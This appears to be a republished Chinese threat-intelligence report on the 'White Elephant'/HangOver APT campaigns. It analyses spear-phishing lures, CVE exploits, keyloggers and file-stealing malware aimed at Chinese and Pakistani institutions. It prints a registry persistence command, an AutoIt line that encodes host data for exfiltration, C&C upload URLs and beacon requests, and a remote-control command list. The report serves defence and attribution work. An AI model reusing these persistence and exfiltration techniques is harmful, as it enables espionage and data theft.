精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

當前位置:安全行業動態 → 正文

白象的舞步——來自南亞次大陸的網絡攻擊

責任編輯:editor005 |來源:企業網D1Net  2016-07-12 15:13:38 本文摘自:黑客與極客

在過去的四年中,安天的工程師們關注到了中國的機構和用戶反復遭遇來自“西南方向”的網絡入侵嘗試。這些攻擊雖進行了一些掩蓋和偽裝,我們依然可以將其推理回原點——來自南亞次大陸的某個國家。盡管我們積極地提醒和協助我們的客戶進行改進防護,并謹慎而有限地披露信息、給予警告,但這種攻擊并未偃旗息鼓,恰恰相反,其卻以更高的能力卷土重來。

1.概述

安天本報告披露其中兩組高頻度攻擊事件,盡管我們尚未最終確定這兩個攻擊波的內在關聯,但可以確定的是其具有相似的目的和同樣的國家背景,我們將其兩組攻擊統稱為——“白象行動”

1.1第一攻擊波的概況

2012年~2013年,安天陸續捕獲了來自白象組織的多次載荷投放,此后依托關聯信息同源分析,找到了數百個樣本,這些樣本多數投放的目標是巴基斯坦,少數則針對中國的高等院校和其他機構。2013年7月,安全廠商Norman所發布的報告,將這一攻擊稱為HangOver。 [1]

安天技術負責人在2014年4月在《計算機學會通訊》發表的《反病毒方法的現狀、挑戰與改進》 [2] 一文中,披露了安天捕獲到的該組織針對中國的攻擊事件:

“從2012年3月起,我們已經陸續捕獲了該事件的一些相關的樣本。而這些樣本對應的網絡事件非常稀少,呈現出高度定向的特點。”

安天在文章中披露了其中6個相關的樣本HASH和被攻擊的目標——中國的兩所高等院校。在2014年的中國互聯網安全大會上,安天在題為《APT事件樣本集的度量》 [3] 的公開報告中,對這個事件做了首次全面披露。2014年8月,安天完成了報告《白象的舞步——HangOver攻擊事件回顧及部分樣本分析》 [4] ,并將這一攻擊組織中文命名為 “白象”。

為區分兩個不同的攻擊波,我們將2012~2013年高度活躍的這組攻擊,在本報告中稱之為“白象一代”。“白象一代”投放了至少近千個不同HASH的PE樣本,使用了超過500個C&C域名地址;其開發人員較多,開發團隊技能混雜,樣本使用了VC、VB、.net、Autoit等多種環境開發編譯;同時其未使用復雜的加密算法,也未發現使用0day漏洞和1day的漏洞,而更多的是采用被部分中國安全研究者稱為“亂扔EXE”的簡易社會工程學——魚叉式網絡釣魚攻擊。PE免殺處理是該攻擊組織所使用的主要技巧,這也是使這組攻擊中的PE載荷數量很大的原因之一。在2015年6月16日的中國反病毒大會上,安天做了題為《A2PT與“準APT”事件中的攻擊武器》 [5] 的技術報告,并把這組攻擊劃分為輕量級APT攻擊。

1.2 第二攻擊波的概況

在第一攻擊波發生后,具有相關基因特點的攻擊載荷開始減少,2014年活躍度開始明顯下降。直到2015年年底,安天又發現一組來自“西南方向”的攻擊進一步活躍,通過持續跟蹤發現本次行動的攻擊主要目標依然為中國和巴基斯坦,通過安天監控預警體系分析發現,中國的受攻擊者主要為教育、軍事、科研等領域。

第二攻擊波的行動擺脫了“白象一代”雜亂無章的攻擊手法,整體攻擊行動顯得更加“正規化”和“流程化”。第二攻擊波普遍使用了具有極高社工構造技巧的魚叉式釣魚郵件進行定向投放,至少使用了CVE-2014-4114和CVE-2015-1641等三個漏洞;其在傳播層上不再單純采用附件而轉為下載鏈接、部分漏洞利用采取了反檢測技術對抗;其相關載荷的HASH數量則明顯減少,其中使用了通過Autoit腳本語言和疑似由商業攻擊平臺MSF生成的ShellCode;同時其初步具備了更為清晰的遠程控制的指令體系。

我們將這組攻擊稱為“白象二代”,我們尚無證據表明“白象一代”和“白象二代”組織間存在人員交叉。從整體上來看,“白象二代”相比“白象一代”的技術手段更為高級,其攻擊行動在整體性和技術能力上的提升,可能帶來攻擊成功率上的提升。而其采用的更加暴力和野蠻的投放方式,使其攻擊次數和影響范圍遠遠比“白象一代”更大。”

“白象二代”的技術手法相比“白象一代”有質的提升,其更符合某些研究者對于APT攻擊的“技術定義”, 但安天始終要指出,APT的“A(高級)”是相對的,是否稱為APT攻擊,主要是分析攻擊的發起方與其動機和意志,而所謂技術水平則不是定性的主要因素。同時,無論是“白象一代”輕量級的攻擊,還是“白象二代”顯得更為高明的攻擊,對于中國龐大的信息體系,特別是針對高等院校等民用機構,構成了嚴重的威脅。

2 白象一代——HangOver的樣本、目標與源頭分析

2.1概述

安天在2012年獲取導向相關的載荷最早的投放行為曾淹沒于其他海量的安全事件中,并未將相關事件判定為APT攻擊。因此需要感謝安全廠商Norman在2013年7月所發布的報告《OPERATION HANGOVER |Executive Summary——Unveiling an Indian Cyberattack Infrastructure》 [1] ,Norman在上述報告根據在分析中發現的原始工程名“HangOve”,將此事件命名為“HangOver”。這組事件即是安天稱為“白象一代”的行動。這讓安天反思過去在發現和追蹤APT攻擊中,過度考慮攻擊技巧和漏洞利用的問題,并開始針對周邊國家對中國攻擊檢測有了新的方法和視角。

安天認為“白象一代”組織中人員較多,人員能力參差不齊,采用開發編譯器混雜,作業相對混亂。通過安天后端分析平臺的關聯統計,查找到該攻擊組織的相關樣本910個,其模塊功能包括鍵盤記錄、下載器,信息竊取等,相關樣本最新的版本號為HangOver 1.5.7 (Startup)。并根據分析判斷相關組織針對中國高等院校等目標實施了攻擊行動。

2.2 樣本與資源分析

安天CERT的研究人員對安天的全樣本集,制定了針對四種編譯二進制文件的關聯方法(Method A~D ),對樣本的動靜態信息進行向量比對和關聯。對于提取出的樣本結果集合,安天CERT研究人員又基于代碼結構的對比進行了誤報排查,最終在已經被其他分析方認定的樣本之外,發現了更多樣本。

圖 2 1 使用不同方法關聯出的新的樣本比例

圖 2 2 “白象一代”挖掘到的關聯樣本的編譯器分布

其中,使用編譯的樣本29個,VB編譯的樣本 189個,VC編譯的樣本127 個。

注:Autoit是一個用于編寫自動化腳本的語言,其編寫的腳本可以編譯成壓縮、單一的可執行文件,這樣就如同其他編譯器生成的PE文件一樣,可以脫離開發環境,運行于Windows系統。

同時,安天CERT也對樣本所使用的C&C IP進行了地理位置對應:

圖 2 3 “白象一代”C&C對應的地理位置

通過對部分樣本的時間戳及編譯器數據的對比可以發現,“白象一代”的樣本編譯時間在2010年下半年到2011年下半年之間的數量最多;2010年上半年的數量較少,屬于開始階段;2012年上半年開始下降,屬于收尾階段。

圖 2 4 “白象一代”不同編譯器樣本的時間戳情況

2.3對中國境內目標的攻擊

2.3.1 攻擊樣本與事件

安天在2014年4月相關文章中,所披露的針對中國兩所大學被攻擊的實事件,涉及以下六個樣本。

 

捕獲時間 樣本hash列表 樣本編號
2012-08-10 0D466E84B10D61031A62AFFCFFF6E31A Sample 1
2012-10-21 734E552FE9FFD1FFDEA3434C62DD2E4B Sample 2
2012-07-24 9A20F6F4CDDEABC97ED46AEE05AC7A50 Sample 3
2012-07-06 CE00250552A1F913849E27851BC7CF0A Sample 4
2012-09-24 DE81F0BDBD0EF134525BCE20B05ED664 Sample 5
2012-08-01 F37DD92EF4D0B7D07A4FBDCD9329D33B Sample 6

 

“白象一代”對中國兩所高校攻擊的時間鏈:

圖 2 5 “白象一代”攻擊中國兩所大學的6個樣本的時間戳與安天捕獲時間對比

圖 2 6 “白象一代”針對中國高等院校的載荷投放攻擊與數據控制獲取的地理場景可視化復現

2.3.2 樣本情況與作業技巧

在上述攻擊中,“白象一代”至少使用了6個樣本,這些樣本采用不同的編譯器(含版本)編譯,其中有4個未加殼,有2個使用了UPX殼。

表 2 1 “白象一代”使用的6個樣本介紹

 

  編譯器 主要行為 回連地址
Sample 1 Microsoft Visual Basic 5.0 / 6.0 釋放的VBScript腳本,腳本執行后連接遠程服務器zolipas.info。(域名失效) http://zolipas.info/advd
Sample 2 Microsoft Visual Studio .NET 2005 — 2008 運行后將以下文件設置為Run自啟C:WINDOWSsystem32CatRoot2{F750E6C3-38EE-11D1-85E5-00C04FC295EE}slidebar.exe,記錄鍵盤信息并上傳。 http://linkspectra.com/k1.php

 

 

Sample 3 UPX Dev-C++ 4.9.9.2 運行后在C:ApplicationDataPrefetch 目錄下生成log.txt文件,不斷的記錄鍵盤、窗口標題、瀏覽器搜索內容、計算機用戶名等信息。  
Sample 4 UPX Microsoft Visual C++ 7.0 運行后試圖創建csetup32.dll,但未成功。
鏈接域名secureplanning.net欲下載其他惡意代碼(URL失效)。
http://secureplanning.net/download/logo2.jpg
Sample 5 Microsoft Visual Studio .NET 2005 — 2008 運行后在
c:Documents and SettingsAdministratorLocal SettingsApplication DataNTUSR目錄下創建文件ntusr1.ini,記錄用戶打開的窗口標題。
不斷地上傳樣本3記錄的信息log.txt
http://periodtable.eu/starx.php
Sample 6 Dev-C++ 4.9.9.2 樣本運行后在C:ApplicationData 目錄下釋放logFile.txt文件,收集各種相關擴展名文檔名稱  

 

圖 2 7 樣本與資源間的關聯

其中有5個樣本投放至同一個目標,這些樣本間呈現出模塊組合作業的特點。4號樣本是初始投放樣本,其具有下載其他樣本功能;3號樣本提取主機相關信息生成日志文件;5號樣本負責上傳;6號樣本采集相關文檔文件信息;2號樣本則是一個鍵盤記錄器。

圖 2 8 樣本的組合模塊作業方式

通過對比安天捕獲上述樣本時各殺毒引擎的檢測情況,以及到Norman曝光此事件后各引擎的檢測情況,可見該攻擊組織使用了一定的免殺技巧。

圖 2 9 樣本在捕獲時和被曝光時的掃描對比

2.4樣本中的典型組件分析

“白象一代”樣本集中包括了多個功能組件,包括:

 

組件名 功能
Keyloger 鍵盤記錄
download 下載
Upload 上傳
http backup HTTP上傳
FTP backup FTP上傳
Usb  Propagator U盤擺渡
Mail Password Decryptor 郵件口令解密

 

因報告篇幅所限,我們僅分析其中的竊密組件。這一組件主要功能是遍歷磁盤中敏感文件(指定擴展名的文件)、主機信息等,并上傳到攻擊者指定的服務器中。

2.4.1樣本標簽

 

病毒名稱 Trojan/Win32.Uploader
原始文件名 Hangover1.5.9.exe
MD5 0e9e46d068fea834e12b2226cc8969fd
處理器架構 X86-32
文件大小 28,9208 Bytes
文件格式 BinExecute/Microsoft.EXE[:X86]
時間戳 2012-09-13 13:09:03
編譯語言 Microsoft Visual C++

 

2.4.2 功能描述

遍歷磁盤文件,上傳敏感文件及主機信息到服務器;

添加啟動項;

遍歷敏感文件(*.doc;*.docx;*.xls;*.ppt;*.pps;*.pptx;*.xlsx;*.pdf);

上傳文件到服務器;

生成上傳文件列表;

文件上傳前,規則化重命名文件;

獲取電腦主機信息;

在當前用戶以及所有用戶啟動文件夾中添加啟動項。

2.4.3功能分析

該樣本遍歷用戶磁盤文件,上傳遍歷到的指定擴展名文件:

*.doc;*.docx;*.xls;*.ppt;*.pps;*.pptx;*.xlsx;*.pdf

每獲取一個文件,在文件上傳之前會先獲取文件時間,轉換為標準時間后和源文件名一起組成新的名字,作為上傳的文件名。主要的函數代碼如下:

圖 2 10 重命名的格式:[原有文件名稱(無后綴)+文件時間+后綴]

樣本獲取到受害主機的所有指定擴展名的文件后,回傳到指定的服務器,回傳的主要流程如下:

圖 2 11 回傳流程

2.5 攻擊來源與攻擊目標的分析

2.5.1樣本集中其他對中國有針對性的樣本分析

表 2 2 樣本標簽

 

病毒名稱 Trojan/BAT.Zapchast.at
原始文件名 未知
MD5 13107B9455561E680FE8C3B9B1E8BC37
處理器架構 X86-32
文件大小 29,4905字節
文件格式 ZIP
時間戳 2011-05-28 16:04:38
數字簽名
加殼類型 ZIP SFX
編譯語言 Microsoft Visual C++ 6.0
VT掃描結果 40 / 51

 

樣本使用PDF圖標進行偽裝,運行后衍生多個文件到系統目錄并運行,同時顯示一張圖片(如圖2-12)該圖片為中國法院的判決書,以迷惑用戶。衍生文件會添加注冊表開機啟動,記錄用戶鍵盤輸入并回傳至遠程服務器。

圖 2 12 樣本中包含帶有中文的圖片

樣本運行后衍生文件列表:

由上表可知主要的惡意文件為spoolsv.exe和ssmss.exe,以下對這兩個文件進行簡要分析。

spoolsv.exe分析:

1. 樣本運行后解密內部配置數據,共有兩處解密函數;

解密1,對一些注冊表啟動鍵值、文件名、要監控的窗體進行解密,算法就是ASCII碼減一。

圖 2 13 解密注冊表、文件名窗體等信息

解密2,對動態加載的DLL名稱、函數解密。

圖 2 14 解密DLL名稱和函數

2. 使用CMD命令添加注冊表啟動項:

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun:InternetDownloadServices

C:WINDOWSwindowssspoolsv.exe

3.創建事件對象Global{9A8FEAD9-92E9-3F1AD79150C2}、使用注冊窗體的方式執行惡意功能代碼;

4.記錄用戶的窗體名稱和鍵盤輸入,特別是對Internet Explorer,Mozilla FireFox的子窗體進行記錄,達到記錄URL地址的目的,記錄的內容寫入sonic.ax;

圖 2 15 通過監控窗體記錄URL地址

5.每記錄100次,復制sonic.ax為sonic1.ax供ssmss.exe使用。

圖 2 16 記錄次數

ssmss.exe分析:

1. 創建事件對象:Global\{D91AD7DF91-92E9-9A8FEA3F50CRC254},獲取計算機名稱;

2. 使用CMD命令添加注冊表啟動項:

reg add HKCUSoftwareMicrosoftWindowsCurrentversion un /v WindowsFirewallSecu rityServ /t REG_SZ /d "C:Documents and Settings*桌面ssmss.exe" /f

3.循環讀取sonic1.ax內容并回傳至URL:s0pp0rtdesk.com/test00.php;

4. 回傳完信息,刪除sonic1.ax。

C&C信息:

***rtdesk.com/test00.php ***.91.197.101 美國

2.5.2 樣本集的時間戳、時區分析

樣本時間戳是一個十六進制的數據,存儲在PE文件頭里,該值一般由編譯器在開發者創建可執行文件時自動生成,時間單位細化到秒,通常可以認為該值為樣本生成時間(GMT時間)。

圖 2 17 提取時間戳

時間戳的分析需要收集所有可用的可執行文件時間戳,并剔除過早的和明顯人為修改的時間,再將其根據特定標準分組統計,如每周的天或小時,并以圖形的形式體現,下圖是通過小時分組統計結果:

圖 2 18 白象組織開發者工作時間

從上圖的統計結果來看,如果假設攻擊者的工作時間是早上八九點至下午五六點的話,那么將工作時間匹配到一個來自UTC+4 或UTC+5時區的攻擊者的工作時間。

圖 2 19 UTC+4或UTC+5的世界時區分布圖位置

根據我們匹配的攻擊者所在時區(UTC+4 或UTC+5),再對照世界時區分布圖,就可以來推斷攻擊者所在的區域或國家。

l UTC+4: 阿拉伯聯合酋長國、阿曼、毛里求斯、留尼汪/留尼旺(法)、塞舌爾、第比利斯、亞美尼亞、阿塞拜疆、阿富汗、阿布扎比。

l UTC+5: 巴基斯坦、馬爾代夫、葉卡特琳堡、烏茲別克斯坦、土庫曼斯坦、塔吉克斯坦、斯里蘭卡、印度。

2.5.3 攻擊組織分析

我們對這一攻擊組織繼續綜合線索,基于互聯網公開信息,進行了畫像分析,認為這是一個由10~16人的組成的攻擊小組。其中六人的用戶ID是cr01nk 、neeru rana、andrew、Yash、Ita nagar、Naga。

3 白象二代——受害者、漏洞和能力

3.1概述

2015年下半年開始的“白象二代”攻擊與“白象一代”有很大不同,其開始使用 CVE-2014-4114 [6] 、CVE-2015-1641等漏洞作為攻擊載荷,其不在直接在附件中投放EXE,而采用“投放社工釣魚郵件+鏈接的方式”,其PE載荷數量也大大減少。

3.1.1 時間鏈

根據安天監控預警平臺匯總的信息,“白象二代”的攻擊目標主要為中國和巴基斯坦。中國受到攻擊面積極為廣泛,“白象二代”對中國發起了大量攻擊事件。自今年以來,我們持續跟蹤該組織,圖3-1為“白象二代”行動的攻擊時間鏈。

圖 3 1 “白象二代”行動的攻擊郵件時間鏈

圖3-2為攻擊文檔存檔事件、PE文件時間戳信息:

圖 3 2 格式文檔和PE載荷時間戳

3.1.2 受害者

“白象二代”組織針對中國的攻擊目標以教育、軍事、科研領域為主。

圖 3 3 受害領域分布

3.2攻擊分析

“白象二代”組織的攻擊主要通過魚叉式釣魚電子郵件,大部分郵件以插入惡意鏈接的方式進行攻擊,通過精心構造的誘餌內容誘導受害者打開鏈接,一旦打開惡意鏈接就會下載帶有漏洞的惡意文檔。

在我們捕獲到的文檔中,大部分是利用CVE-2014-4114漏洞的PPS文件、少量利用CVE-2015-1641漏洞的rtf文件。

3.3 魚叉式釣魚攻擊

魚叉式釣魚攻擊,APT攻擊中最常見的攻擊方式,與普通的釣魚郵件不同,魚叉式釣魚攻擊不會批量的發送惡意郵件,而只針對特定的公司、組織的成員發起針對性攻擊,具體的攻擊手法又分為兩種:

1. 在郵件中植入惡意附件,誘導受害者打開附件文件。

2.在郵件正文中插入惡意鏈接,誘導受害者點擊鏈接,一旦受害人點擊鏈接就會跳轉到惡意鏈接,該鏈接或是掛馬網站,或是惡意文件下載地址。

本次行動中“白象二代”組織使用的手法主要是第二種,因為該方式在郵件中不存在附件,更容易通過安全軟件的檢測。鏈接相對附件也更容易騙取用戶的信任,郵件內的鏈接都是利用的第三方域名跳轉,多數以 為跳轉域名。

3.3.1案例1:針對中國高校教師的釣魚郵件

這是一封針對中國高校教師的魚叉式釣魚郵件,正文內容是關于南海問題,在郵件的最后誘導受害者點擊鏈接查看“完整版報告”。一旦用戶點擊該鏈接就會下載惡意文檔。該文檔使用了CVE-2014-4114漏洞,且采用PPS格式自動播放的特點,來實現文檔打開漏洞既被觸發。

圖 3 4 魚叉式釣魚郵件1

郵件內容大意為:

中國與東南亞的關系:

中國南海,更有張力和挑戰(2016年五月報告)

在2016年年初,多個國家關注中國南海爭議。以美國為首的多個國家對中國進行了言辭強烈的譴責,中國強烈譴責美國的行動和軍事部署。

北京仍然有決心解決有爭議的問題,尤其是習近平主席在2015年9月期間提出中國在南海無意搞軍事化,緊張情緒并沒有蔓延,美國,中國會議增多的跡象向東南亞各國政府表明、華盛頓沒有、北京也沒有尋求對抗。在此背景下,這些國家的政府對中國挑戰其在中國南海權益的答復仍然是衡量為主。過去,他們常常減少面對中國時的自信,展示了對中國的一些批評,變得更愿意以阻止中國,并與美國更緊密地聯系起來……

3.3.2 案例2:針對國內科研機構的釣魚郵件

這是另一封針對國內科研機構的魚叉式釣魚郵件,以一封標有TOP SECERT(絕密檔案)的文檔掃描圖片為正文誘導受害者點擊下面的“絕密報告”,一旦受害者點擊鏈接就會下載一個惡意文檔。該文檔使用了CVE-2014-4114漏洞,且采用PPS格式自動播放的特點,來實現文檔打開漏洞既被觸發。

圖 3 5 魚叉式釣魚郵件2

郵件內容中文大意為:

我們的國防部長

序號1.

Contr Nr:X-0850

日期:1969年2月20日

文檔,主題&內容:由國防部長給總統的備注:沖繩基地和部隊。響應在1月27日會議中提出的問題。注意這些都是參謀長聯席會議的答復,國防部將通過正在進行的NSC研究來提供明確的政策。因此不提供國防部長的觀點。回答的問題包括了沖繩部隊的規模,在那里的原因,未來需要的基地等。附:國防部長指出要求從參謀長聯席會議主席到總統的轉交并指出ISA還沒有評論。

序號2.

Contr Nr:X-1383

日期:1969年5月19日

文檔,主題&內容:由國防部長給參謀長聯席會議主席的備注:核能力的退化-在琉球基地和備用…

3.3.3 案例3:針對中國軍事愛好者的釣魚郵件

這是一封與軍事相關的釣魚郵件,針對中國軍事愛好者的攻擊,同樣的在正文中嵌入一個鏈接,該鏈接指向一個惡意文檔,該文檔是一份WORD文檔,采用的漏洞與前兩個案例的PPS有所不同。系一個以.doc為擴展名的RTF格式文檔,使用漏洞為CVE-2015-1641。

圖 3 6 魚叉式釣魚郵件3

3.4 相關誘餌文件

“白象二代”組織的主要使用PPS(Powerponit的自動播放格式)和具有WORD擴展名的RTF格式文檔為誘餌文件,在我們捕獲樣本中大部分都是與軍事相關的誘餌文件。

圖 3 7 “最致命的5款無人機”誘餌文件截圖

圖 3 8 “中國人民解放軍即將推出的第五代作戰條例”誘餌文件截圖

圖 3 9 “南海沖突對歐洲安全的影響”誘餌文件截圖

圖 3 10 “涉及中國的海上領土和專屬經濟區域爭端”誘餌文件截圖

圖 3 11 “中巴經濟走廊對印巴關系的影響”誘餌文件截圖

3.5 漏洞利用

安天目前監測到的“白象二代”組織使用的漏洞均為已知的Office格式文檔漏洞,部分樣本在使用了一定技巧用于對抗安全軟件的檢測,從我們對歷史掃描結果的追溯來看,這種技巧是有效的。

3.5.1 樣本標簽

 

病毒名稱 Trojan[Exploit]/Win32.CVE-2014-4114
原始文件名 2016_China_Military_PowerReport.pps
MD5 F0D9616065D96CFCBB614CE99DD8AD86
文件大小 12,801,024 字節
文件格式 Document/Microsoft.PPS
最后存檔時間 2016-05-18 05:24:54

 

3.5.2 CVE-2014-4114

我們在跟蹤沙蟲攻擊組織中,曾對CVE-2014-4114漏洞 [7] 進行過較為長時間的分析,這個漏洞的最大特點是其雖然依托格式文檔,但并非依靠格式溢出。而是通過遠程代碼執行來實現。因此穿透了Windows的DEP、ASLR機制。

白象攻擊使用的PPS擴展名樣本利用Windows OLE 遠程代碼執行漏洞CVE-2014-4114釋放并執行可執行文件。值得注意的是我們在此前分析過的其他攻擊組織使用的4114樣本中,多數為Office高版本格式,該格式是一個以XML為索引的壓縮包,其內嵌的PE載荷會被殺毒軟件在解壓遞歸中檢測到。

圖 3 12 CVE-2014-4114歷史樣本的典型結構

圖 3 13 “白象二代”相關樣本的結構

但這次“白象二代”組織使用了低版本Office的傳統LAOLA格式,由于對安全廠商來說這是一個“未公開格式”,達到了一定的免殺效果。如圖3-14是多引擎對照掃描結果,可以看出此樣本的確躲避了大部分安全軟件的檢測。

注:LAOLA文件格式是微軟在早期OFFICE版本自定義的“復合文檔二進制結構”(Compound File Binary Format),微軟未公開相關文件格式。但傳統反病毒廠商為有效應對宏病毒,通過逆向工程方式,對該結構形成了解析能力。但該格式對很多新興安全廠商構成了障礙。

圖 3 14 多引擎掃描結果

3.5.3 其他

該組織除了利用上面提到的漏洞外,還有少部分文件利用了CVE-2015-1761 、CVE-2012-0158漏洞,這兩個漏洞的載荷都針對WORD設計,對于這兩種漏洞,攻擊者并沒有作的檢測對抗,基本上直接利用了網上公開的利用代碼,因此現有反病毒引擎對于這兩種漏洞文件的檢出率相對較高。

3.6 功能樣本情況

從目前捕獲的樣本來看,“白象二代”組織使用的PE載荷樣本技術水平不高,沒有較為復雜的模塊體系和加密抗分析機制,一部分樣本是利用的腳本語言編寫的程序,還有一些是采用網上公開的代碼重新編譯后利用。

3.6.1 竊密模塊

樣本標簽:

 

病毒名稱 Trojan/Win32.AutoIT
原始文件名 sysvolinfo.exe
MD5 A4FB5A6765CB8A30A8393D608C39D9F7
處理器架構 X86-32
文件大小 11,659,903 字節
文件格式 BinExecute/Microsoft.EXE[:X64]
時間戳 2016-05-13 07:55:20
數字簽名 NO
加殼類型
編譯語言 AutoIT

 

白象二代組織使用的攻擊樣本中,有多個樣本是使用Autoit編寫的,主要目的用于竊取數據并打包回傳到遠程服務器,具體的功能如下:

1.回傳系統基本信息,包括系統版本,架構,是否裝有Chrome,樣本版本信息等;

$postdata = “ddager=” &$regstat &“&r1=” &b64encode(@OSVersion) &“&r2=” &b64encode(@OSArch) &“&r3=” &b64encode($p_ver) &“&r4=” &b64encode($emorhc) &“&r5=” &b64encode($cmdout) &“&r6=” &b64encode($admin)

2. 具有遠程控制功能,根據遠程服務器指令的不同,執行不同的操作。從相關指令集上來看,設計相對比較粗糙;

圖 3 15 指令分支

 

分支 對應功能
1 輸出調試信息,并延遲1秒后重新連接C&C。
2 利用PowerShell提權,并執行遠程接受的PowerShell指令,對應的指令編號為2。
3 這個指令是修改$stat的標記值。
4 退出。
5 收集Chrome瀏覽器中記錄的網站用戶名及密碼,對應的指令編號為5。
6 利用PowerShell執行下載新惡意程序,并運行,對應的指令編號為6。
7 利用Autoit自帶函數執行下載新惡意程序,并運行,對應的指令編號為7。
8 以隱藏的模式執行CMD命令,并記錄命令返回數據。

 

3. 收集計算機內的各類文檔文件,以MD5命名打包后上傳到C&C,白象一代和白象二代收集的擴展名對比如下:

 

白象一代 *.doc *.docx *.xls *.ppt *.pps *.pptx *.xlsx *.pdf      
白象二代 *.doc *.docx *.xls *.ppt   *.pptx *.xlsx *.pdf *.csv *.pst *.jpeg

 

圖 3 16 收集文件代碼

釋放cup.exe程序,并以打包的文件路徑為參數調用,cup.exe的主要功能是上傳竊取的文件。

圖 3 16 收集文件代碼

釋放cup.exe程序,并以打包的文件路徑為參數調用,cup.exe的主要功能是上傳竊取的文件。

樣本標簽如下:

 

病毒名稱 Trojan[Exploit]/Win32. ShellCode
原始文件名 sysvolinfo.exe
MD5 465DE3DB14158005EDE000F7C0F16EFE
處理器架構 X86
文件大小 10,536,063 字節
文件格式 BinExecute/Microsoft.EXE[:X86]
時間戳 2016-05-16 13:35:59
數字簽名
加殼類型
編譯語言 Microsoft Visual C# / Basic .NET

 

樣本使用Microsoft Visual C#編譯,功能是利用ShellCode來實現連接遠程服務器,接收ShellCode并執行。功能簡單,而且樣本沒做混淆,通過反編譯可以看到明文代碼。我們在商業攻擊平臺MSF生成的ShellCode中可以找到這個片段,但由于這個方法過于通用,目前我們還不能得出白象攻擊組織使用了MSF平臺的結論。

圖 3 18 利用的ShellCode代碼

樣本從服務器接收到的shellcode在完成自解密之后,會與服務器進行交互操作,接收指令并執行,將結果返回給服務器,圖3-19為樣本的運行流程:

圖 3 19 樣本運行流程

3.7 C&C分析

本次行動中漏洞樣本下載都是通過URL下載的方式,而釋放的竊取數據、遠程控制樣本的C&C多數為硬編碼的IP地址,圖3-20為“白象二代”組織使用的部分域名、IP、PE文件和Office文件的對應關系:

圖 3 20 “白象二代”中域名、IP、樣本關系圖

3.8 隱藏、追蹤

3.8.1 第三方郵件服務

我們通過對部分攻擊郵件分析發現,該組織發送郵件的方式是通過第三方郵件服務商群發,這樣在原始郵件的數據中只會存有郵件服務商的信息,攻擊者通過這樣的手法在一定程度上隱藏了自己的IP。

圖 3 21 原始郵件信息

3.8.2 入侵網站

在安天的跟蹤分析中,發現該組織的部分C&C地址是一些正常的網站,經過分析我們認為,有可能該組織入侵了這些網站,將自己的C&C服務控制代碼放到它們的服務器上,以此來隱藏自己的IP信息。同時這種方式還會使安全軟件認為連接的是正常的網站,而不會觸發安全警報。

GET /UAV/ HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; MSOffice 12)

Accept-Encoding: gzip, deflate

Host: www.***gdeals.com

Connection: Keep-Alive

圖 3 22 可能被入侵的網站

GET /facilities/welfare2/news HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; MSOffice 12)Accept-Encoding: gzip, deflateost:

圖 3 23 可能被入侵的網站

3.8.3 與背景和來源相關的信息

基于現有資源可以分析出,“白象二代”組織一名開發人員的ID為:“Kanishk”,通過維基百科查詢到一個類似單詞“Kanishka”,這是一個是梵文譯音,中文翻譯為“迦膩色迦”,迦膩色伽是貴霜帝國(Kushan Empire)的君主,貴霜帝國主要控制范圍在印度河流域。

圖 3 24 “Kanishk”相關信息

4 總結

4.1兩代“白象”的對比

我們將“白象一代”和“白象二代”的部分要素通過表格的形式進行了對比,可以看出相關國家背景攻擊能力的發展:

 

  白象一代 白象二代
主要威脅目標 巴基斯坦大面積的目標和中國的少數目標(如高等院校) 巴基斯坦和中國的大面積目標,包括教育、軍事、科研、媒體等各種目標
先導攻擊手段 魚叉式釣魚郵件,含直接發送附件 魚叉式釣魚郵件,發送帶有格式漏洞文檔的鏈接
竊取的文件類型 *.doc  *.docx  *.xls  *.ppt
*.pps  *.pptx  *.xlsx  *.pdf
*.doc  *.docx  *.xls  *.ppt   
*.pptx  *.xlsx  *.pdf  *.csv
*.pst  *.jpeg
社會工程技巧 PE雙擴展名、打開內嵌圖片,圖片偽造為軍事情報、法院判決書等,較為粗糙 偽造相關軍事、政治信息,較為精細
使用漏洞 未見使用 CVE-2014-4114
CVE-2012-0158
CVE-2015-1761
二進制攻擊載荷開發編譯環境 VC、VB、DEV C++、AutoIT Visual C#、AutoIT
二進制攻擊載荷加殼情況 少數使用UPX 不加殼
數字簽名盜用/仿冒 未見 未見
攻擊組織規模猜想 10~16人,水平參差不齊 有較高攻擊能力的小分隊
威脅后果判斷 造成一定威脅后果 可能造成嚴重后果

 

4.2 大國網絡空間防御能力最終會由攻擊者和窺視者檢驗

在過去數年間,中國的信息系統和用戶遭遇了來自多方的網絡入侵的持續考驗,這些攻擊使用各種高級的(也包括看起來并不足夠高級的)攻擊技巧,以獲取機要信息、科研成果和其他秘密為對象。攻擊組織在關鍵基礎設施和關鍵信息系統中長期持久化,以竊密和獲取更多行動主動權為目的,其危害潛在之大、影響領域之深,絕非網站篡改涂鴉或傳統DDoS所能比擬。這些攻擊也隨實施方的戰略意圖、能力和關注點的不同,表現出不同的方法和特點。盡管中國用戶更多焦慮于那些上帝視角[7]的攻擊,但從我們針對“白象”的分析可以看到,來自地緣利益競合國家與地區的網絡攻擊,同樣是中國信息化的重大風險和挑戰。而且這些攻擊往往雖然顯得有些粗糙,但卻更為頻繁和直接,揮之不去。

對于類似白象這樣的攻擊組織,因缺少人脈和電磁能力作為掩護,其更多依賴類似電子郵件這樣的互聯網入口。從一個全景的防御視圖來看,這本來是一個可以收緊的入口,但對于基礎感知、檢測、防御能力不足的社會肌體來說,這種具有定向性的遠程攻擊是高度有效的,而且會淹沒在大量其他的非定向的安全事件中。

大國防御力,由設計所引導、以產業為基礎、與投入相輔相成,但最終其真實水平,要在與攻擊者和窺探者的真實對壘中來檢驗。

4.3 APT防御需要信息化基本環節和安全能力的共同完善

從“白象”系列攻擊中,我們首先能看到中國在信息化發展上的不足。在“白象二代”組織所投放的目標電子郵箱當中,其中很大比例是免費個人郵箱,在安天之前關于我國郵件安全的內部報告中,就已經指出國內機構用戶有近一半的都使用免費個人信箱作為聯絡郵件這一問題。而國內免費信箱的安全狀況已高度不容樂觀。在啟動信息高速公路建設二十年后,國內依然沒有對官方機構和政務人員實現有效的安全電子郵件服務的覆蓋,這種企業、機構級信息化基礎設施的匱乏,包括互聯網服務商缺乏有效的安全投入,導致了可攻擊點高度離散,降低了攻擊門檻,提升了防御難度。

